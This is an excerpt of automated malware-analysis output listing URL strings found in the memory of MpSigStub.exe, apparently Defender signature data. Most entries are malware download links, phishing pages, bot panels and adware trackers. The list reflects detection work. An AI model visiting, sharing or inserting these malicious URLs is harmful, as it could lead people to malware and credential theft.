Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://soriya.kr
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://sp.whitetruem.com/g.php?d=
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://speedmasterprinters.co.za/erroreng/erroreng/erroreng/erroreng/ii.php
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://sploogetube.mobi/x.ps1
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://spotdewasa.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://spotvideoporno.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://spr-updates.ddns.net/spr_updates.php-o
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://sprout17.blond.av4610.net/set_inf.php?id=movie_ef.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://spy-kill.com/bho_adult.txt
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: http://spyarsenal.com/cgi-bin/reg.pl?p=GKL&key=%s&v=%s&email=%s
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://spywaresoftstop.com/download/141/setup.exe
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://spywaresoftstop.com/load.php?adv=141
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://spywaresoftstop.com/wfdfdghfdghj.htm
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://spywprotect.com/purchase
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://squash13.navy.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: http://srmvx.com.br/uploads/
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://srv166997.hoster-test.ru/decidedly/barrier/barbara/seem/phaytd.dot
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://srv87992.ht-test.ru/west/excelz/index.php
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: http://staging.stikbot.toys/24.gif
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: http://stankomeland.duckdns.org/js//share.php
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://start.abauit.com/logo.png?v7err
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://stasmaster.hut2.ru/rcv.php
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://stat.errclean
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://stat.t2t2.com/log/log1.asp?default&user=
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://stat.wamme.cn
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://stat.wamme.cn/C8C/gl/cnzz60.html
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://stat.wamme.cnxv
Source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp String found in binary or memory: http://statapi.aldtop.com
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp String found in binary or memory: http://static.hostsecureplugin.com/sdb/fd/host-secure-updater.xml
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://staticrr.mixvideoplayer.com/sdb/e0/WebBrowser.xml
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: http://statisonline.casa/register.jpg
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://statistics.tom.com/scripts/Skype/sobar.exe
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://statistics.tom.com/scripts/Skype/sobar.exehttp://61.135.159.183/installer/sobar.exehttp://sky
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://stats.hosting24.com/count.php
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://status.clrsch.com/loader/
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://status.qckads.com/
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://stiags.com.mx/zjeixcphncer/nbsa_
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://stilldesigning.com/wp-content/themes/stilldesigning-2014/langu
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://stive.hopto.org/pak.dot
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://stmichaelolivewood.com/templates/landofchrist/css/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6274632476.00000197A2E92000.00000004.00000001.sdmp String found in binary or memory: http://stroylux.ro/ds/1.gif
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://stroyprivoz.ru/dokumente-vom-notar/
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://student5.lab.classroom.kingdomit.org/wp-content/rechnungs-detail
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp String found in binary or memory: http://sturfajtn.com
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp String found in binary or memory: http://stwinwebservices.examsoft.com/
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp String found in binary or memory: http://subca.crl.certum.pl/ctnca.crl0k
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp String found in binary or memory: http://subca.ocsp-certum.com01
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://sucesores.com.mx/images/logo.gif
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://suckjerkcock.date
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://sun346.neta
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://sundsvallsrk.nu/tmp/lns.txt
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://sunrypero.cf/document5.doc
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://superbit.rs/wp-content/themes/one-page/js/gr.mpwq
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://superdoor.ch/media/jui/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://superfast.com.sapo.pt/fotos.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://superkahn.ru:8080/index.php
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://superpuperdomain.com/count.php?ref=
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://supportwebcenter.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://sustainabletourismint.com/la)
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://svc-stats.linkury.com/
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://switercom.ru/ds/26.gif
Source: MpSigStub.exe, 00000024.00000003.6327431635.00000197A37A2000.00000004.00000001.sdmp String found in binary or memory: http://sxload.com
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://systemfile.online
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://systemjhockogyn.com.br/boa.php
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://t%69%61%6ejinc%6e.cn
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://t.amy
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://t.amynx.com/
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://t.awcna.com/mail.jsp?dde
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://t.cn
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://t.cn/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://t.co/
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp String found in binary or memory: http://t.go4321.com
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp String found in binary or memory: http://t.jdjdcjq.top/
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp String found in binary or memory: http://t.me/decovid19bot
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://t.tr2q.com
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://t.zer9g.com/
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://t.zz3r0.com/
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp String found in binary or memory: http://tablet.doyo.cn/pop_window/pw_318_215
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://taggsalimentos.com.br/pdf/login.htm
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://tak-tik.site/crun20.gif
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: http://talele.50megs.com/Installer/safe.zip
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: http://talele.50megs.com/Installer/safe.zipx
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://talk-of-the-tyne.co.uk/download
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://tamus.cz.cc/el/load.php?spl=javad
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp String found in binary or memory: http://taobao.ha
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp String found in binary or memory: http://taobao.haodizhi.ccx
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp String found in binary or memory: http://tbapi.search.ask.comxb
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://te.clickpotato.tv/pte.aspx
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://te.platrium.com/pte.aspx
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://techwach.com
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: http://tecmon.hr/
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: http://teladea.blogspot.com
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://temp.hbsouthmomsclub.com:8080/gnutella.js
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/IUserService/GetUsersResponse
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/IUserService/GetUsersResponseaX
Source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/IUserService/GetUsersResponsex:
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/IUserService/GetUsersT
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/OSoft.Services.Webservice.SystemConfigService/SystemConfigServicexk
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/QuanLyGaraOtoDataSet.xsd
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/SampleProductsDataSet.xsd
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/T
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/db_restorentDataSet.xsd
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/payrollDataSet1.xsd
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/x
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://tendancekart.com/
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://tenillar.com/ko/pos.phpmethod=post
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://tescohomegroseryandelectronicstday2store.duckdns.org/office/
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://test.1g.io:3000
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://test.ru/botadmin/index.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://thankyou.orderreceipts.square7.ch/applica.exe
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://theenterpriseholdings.com/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://thehairhive.ca/meg/retwesq.exe
Source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp String found in binary or memory: http://theonlybookmark.com/in.cgi?11&group=adv001URLGeneral1http://google.com/install.php?time=%dTim
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp String found in binary or memory: http://thescanwinantivirxp.com/index.php?
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://thevgjhknjkstore.com/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://thomastongrealestate.com/skywkc/3415201.pnga
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://thomastongrealestate.com/skywkc/dd(oaoabp%
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp String found in binary or memory: http://tibia.pl/earth.php?x=
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp String found in binary or memory: http://tikotin.com
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://tiny.cc/Tiktok-Pro
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com/
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com/allinone-downloader
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com/glpdpd4
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com/h7okabu)
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com/hop4az9)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com/jfrwrhe)
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com/jnvyzcl
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com/jy69pnw)
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com/oc725yj
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://tirb.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: http://tissueling.com
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://titiaredh.com/redirect/
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: http://titulospdf.ddns.net
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://tj.kpzip.com
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://tjuegost.info/downloads.html
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp String found in binary or memory: http://tkcode.xyzx
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://tldrnet.top/
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://today-friday.cn/maran/sejvan/get.php
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://tokziraat.com/templates/kallyas/images/favicons/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://toliku.com/qmzo.exe
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://tongji.bianya.cc/popup.ashx?type=0
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://tongji.bianya.cc/popup.ashx?type=0xM
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://tonisantafe.com/wp-content/themes/lobo/woocommerce/cart/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://tool.tesvz.com/images/nxz375.jpg
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://tool.world2.cn/toolbar/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://toolbar.deepdo.com/download/
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp String found in binary or memory: http://toolbarpartner.com
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://topguide.co.kr/update/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://topiclab.com/wp-includes/css/index.php)
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://torscreen.org
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://track.wwwapps-ups.com/stats/xstats.php
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp String found in binary or memory: http://tracker.civas.co/UserTracker_deploy/requesthandler.aspx
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://trackhits.cc/cnt
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://traderspusers.hol.es/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://traducerejuridica.ro/tenlxhlzpagc/625986.png
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://traducerejuridica.ro/tenlxhlzpagc/D
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://traff.step57.info/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://transfer.sh/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://traveling-blog2017.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6275847061.00000197A4698000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://trex-miner.com
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: http://trialservice.genesystuna.com/io/excelz/index.php?email=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://try-anything-else.com/
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://tsdyprivatecloudshareandfileprotectsyta.ydns.eu/receipt/invoice_141140.doc
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://tsrv1.ws
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp String found in binary or memory: http://tsrv4.ws/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://tukangecuprus.com/cr_file_inst.exe
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://tulip45.sepia.adulteroero.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://tumicy.com/plqijcndwoisdhsaow/
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: http://turbogalaxy.org/ru/?q
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://turtleone.zapto.org/out.rtf
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://twister.agropecuaria.ws/agro/twister.zip
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://twitck.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://twogreekgirls.com/wp-content/wellsfargo-online-update/com.htm)
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://u.to/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://u.to/PbrTEg
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://u.to/ardgdq)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://u.to/sqivdw)
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://ubercancellationfeelawsuit.com/p.png
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://ucil-bd.com/swfobject/alape/index.php)
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: http://uidacrtsppxece.com/ioir.png
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://uiltime.info/?c=v3
Source: MpSigStub.exe, 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp String found in binary or memory: http://ulink7.dudu.com/
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://ulog.cleaner2009pro.com/?action=
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://ultimatepropertiesllc.com/ike.exe
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp String found in binary or memory: http://uncpbisdegree.com/download3.php?q=
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp String found in binary or memory: http://uncpbisdegree.com/download4.php?q=
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://uniblue.com
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://unifscon.com/RemAp.exe
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://uninstall.justplug.it
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://uninstall.justplug.it//?ext=824&pid=946
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: http://uninstall.justplug.it/?pid=21&ext=bcool
